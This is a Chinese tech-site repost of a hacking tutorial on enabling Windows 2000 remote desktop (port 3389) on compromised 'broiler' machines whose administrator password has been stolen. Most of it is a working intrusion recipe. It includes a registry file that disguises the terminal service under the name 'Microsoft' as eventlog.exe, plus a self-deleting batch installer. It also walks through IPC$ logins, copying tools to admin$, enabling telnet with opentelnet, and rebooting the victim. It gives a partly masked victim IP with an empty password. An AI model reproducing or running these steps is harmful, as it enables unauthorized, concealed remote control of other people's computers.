扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
在win2000 Professional版中安装3389终端服务
众所周知windows2000 profassional并不支持3389终端服务,所以我们如果发现得到管理员密码的肉机是此版本,只能放弃安装终端服务的念头。但是现在我们已经可以在profassional版中安装终端服务了!
方法如下:
1. 将profassional版改变为server版
2. 安装终端服务
关于安装终端服务的细节网络中已经有许多优秀的文章,这里不再重复。
下边就说说如何将profassional版改变为server版:
原理:其实windows 2000的各个版本都使用了同样的程序、动态链接库,它们之间最大的差别是在注册表中。windows2000三合一光盘就证明了这一点。因此只要将profassional版注册表中的相关项目改为server及以上版本,就可以在profassional版中安装终端服务了。
现在3am Laboratories已经将改变win2000版本的方法做成一个非常方便使用的软件:NTSwitch,让我们可以随心所欲地快速改变版本。此软件可以在小凤居中下载到,下载地址为URL http://www.chinesehack.org/down/show.asp?id=2192&down=1
可能由于微软的压力,3am Laboratories已将此软件从其主页中删除,大家快下载吧!
远程版本变换的具体实现方法:
法1:
1 在远程肉机上运行支持图形界面的远程控制程序(如:冰河、PcAnyWhere等)
2 远程控制下,下载并运行NTSwitch改变版本
3 安装3389终端服务
此法非常方便,技术要求最低。但操作过程对方是全部可以看见的,非常危险!
法2:
1 自己将自己本地的win2000 professional改变为win2000 server版,利用注册表对比软件对比版本变换前后注册表的差别。将差别制作成一个chang.reg文件。
2 利用所得到的肉机管理员密码,开启肉机Telnet服务。
3 Telnet上肉机后,利用regedit.exe /s chang.reg 命令, 将远程注册表改变,从而实现远程win2000的版本变换。
此法需要一定的经验,但操作很安全。而且可以用“迷途vb”的方法进一步安装3389终端服务。
以下是“迷途vb”的安装3389终端服务方法
========================
首先我们制作开启3389的工具
先把下面的注册表内容copy一份,另存为3389.reg注册表文件
注册表内容:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
"Enabled"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ShutdownWithoutLogon"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"EnableAdminTSRemote"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002
[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
"Hotkey"="1"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
"ObjectName"="LocalSystem"
"Type"=dword:00000010
"Description"="Microsoft"
"DisplayName"="Microsoft"
再把下面的内容保存为批处理文件3389.bat
安装批处理内容:
copy termsrv.exe eventlog.exe
regedit.exe /s 3389.reg
del 3389.reg
del 3389.exe
del 3389.bat
用winrar制作成exe自解压缩包
61.188.***.*** user:administrato pass:空
先使用工具letmein判断其操作系统
letmein \\ip -all -d
TsInternetUser (TsInternetUser)这个是2000的终端用户,现在可以判断其为2000server了
再使用终端登陆软件看看他的3389是不是已经开启了免了费事折腾
应该没有开启了
建立ipc连接
copy工具过去
net use \\ip\ipc$ "pass" /user:name
copy file \\ip\admin$\system32
用opentelnet开对方的telnet
opentelnet \\ip name pass 1 99
用telnet进入
进入到对方的winnt\system32目录
解压缩3389.exe
运行安装批处理3389.bat
现在我们把对方重起一下,用reboot
我们用ping命令监视他的上线情况,等他下线,呵呵下了,又上来了,不慌连,3389等会才能好,对方的机器有点慢看见了么,开启成功!
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。
现场直击|2021世界人工智能大会
直击5G创新地带,就在2021MWC上海
5G已至 转型当时——服务提供商如何把握转型的绝佳时机
寻找自己的Flag
华为开发者大会2020(Cloud)- 科技行者